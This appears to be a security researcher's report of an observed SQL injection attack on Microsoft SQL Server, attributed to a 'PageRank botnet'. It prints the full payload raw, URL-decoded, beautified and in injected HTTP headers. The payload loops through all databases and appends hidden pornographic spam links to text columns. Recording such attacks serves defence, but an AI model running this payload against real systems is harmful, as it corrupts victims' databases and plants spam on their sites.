SQLi PageRank Botnet Microsoft SQL Server

SQL Injection attempts
Reported by neonprimetime security
http://neonprimetime.blogspot.com

*****
Blog Describing this in detail: http://neonprimetime.blogspot.com/2015/11/pagerank-botnet-sqli-analysis.html
*****

Source IP: 85.136.227.77
NOTE: Possibly from PageRank Botnet
Target: Microsoft SQL Server
*****
GET /page.aspx?id=999');declare%20@b%20cursor;declare%20@s%20varchar(8000);declare%20@w%20varchar(99);set%20@b=cursor%20for%20select%20DB_NAME()%20union%20select%20name%20from%20sys.databases%20where%20(has_dbaccess(name)!=0)%20and%20name%20not%20in%20('master','tempdb','model','msdb',DB_NAME());open%20@b;fetch%20next%20from%20@b%20into%20@w;while%20@@FETCH_STATUS=0%20begin%20set%20@s='begin%20try%20use%20'%2B@w%2B';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20''update%20%5B''%2BTABLE_NAME%2B''%5D%20set%20%5B''%2BCOLUMN_NAME%2B''%5D=%5B''%2BCOLUMN_NAME%2B''%5D%2Bcase%20ABS(CHECKSUM(NewId()))%2510%20when%200%20then%20''''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''group%20sex%20stories%20with%20pictures%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''www.ohiovalleyrestoration.com''%2Bchar(47)%2B''blog''%2Bchar(47)%2B''template''%2Bchar(47)%2B''page''%2Bchar(47)%2B''moms-sex-stories.aspx%22''%2Bchar(62)%2B''''''%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''''stories%20of%20sex''''%20when%201%20then%20''''ohiovalleyrestoration.com''''%20else%20''''read''''%20end%20%2B''''''%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20hot%20hot%20interracial%20sex%20stories''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''''%20else%20''''''''%20end''%20FROM%20sysin dexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid%20in%20(0,1))%20and%20DATA_TYPE%20like%20''%25varchar''%20and(CHARACTER_MAXIMUM_LENGTH%20in%20(2147483647,-1));open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c%20end%20try%20begin%20catch%20end%20catch';exec%20(@s);fetch%20next%20from%20@b%20into%20@w;end;close%20@b--

*************
URL Decoded
*************
GET /page.aspx?id=999');declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''group sex stories with pictures ''+char(60)+''a href="http:''+char(47)+char(47)+''www.ohiovalleyrestoration.com''+char(47)+''blog''+char(47)+''template''+char(47)+''page''+char(47)+''moms-sex-stories.aspx"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''stories of sex'''' when 1 then ''''ohiovalleyrestoration.com'''' else ''''read'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' hot hot interracial sex stories''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysin dexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

***********
Beautified
***********
');
declare @b cursor;
declare @s varchar(8000);
declare @w varchar(99);
set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master ',' tempdb ',' model ',' msdb ',DB_NAME());
open @b;fetch next from @b into @w;
while @@FETCH_STATUS=0 begin set @s='begin
try use '+@w+';
declare@ c cursor;
declare@ d varchar(4000);
set@ c = cursor for select '' update['' + TABLE_NAME + ''] set['' + COLUMN_NAME + ''] = ['' + COLUMN_NAME + ''] +
    case ABS(CHECKSUM(NewId())) % 10 when 0 then ''
'' '' + char(60) + '' div style = "display:none" '' + char(62) + '' group sex stories with pictures '' + char(60) + '' a href = "http:''+char(47)+char(47)+''www.ohiovalleyrestoration.com''+char(47)+''blog''+char(47)+''template''+char(47)+''page''+char(47)+''moms-sex-stories.aspx" '' + char(62) + '' '' '' + case ABS(CHECKSUM(NewId())) % 3 when 0 then '' '' stories of sex '' ''
when 1 then '' '' ohiovalleyrestoration.com '' '' else '' '' read '' '' end + '' '' '' + char(60) + char(47) + '' a '' + char(62) + '' hot hot interracial sex stories '' + char(60) + char(47) + '' div '' + char(62) + '' '' '' else '' '' '' '' end '' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id = o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME = TABLE_NAME WHERE(indid in (0, 1)) and DATA_TYPE like '' % varchar '' and(CHARACTER_MAXIMUM_LENGTH in (2147483647, -1));
open@ c;
fetch next from@ c into@ d;
while@@ FETCH_STATUS = 0 begin exec(@d);
fetch next from@ c into@ d;
end;
close@ c end try begin catch end catch ';
exec (@s);
fetch next from @b into @w;
end;
close @b--

***********

HTTP/1.1..User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0');declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">group sex stories with pictures <a href="http://www.ohiovalleyrestoration.com/blog/template/page/moms-sex-stories.aspx">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''stories of sex'''' when 1 then ''''ohiovalleyrestoration.co m'''' else ''''read'''' end +''''</a> hot hot interracial sex stories</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--..Referer: http://google.com');declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">group sex stories with pictures <a href="http://www.ohiovalleyrestoration.com/blog/template/page/moms-sex-stories.aspx">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''stories of sex'''' when 1 then ''''ohiovalleyrestoration.com'''' else ''''read'''' end +''''</a> hot hot interracial sex sto ries</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--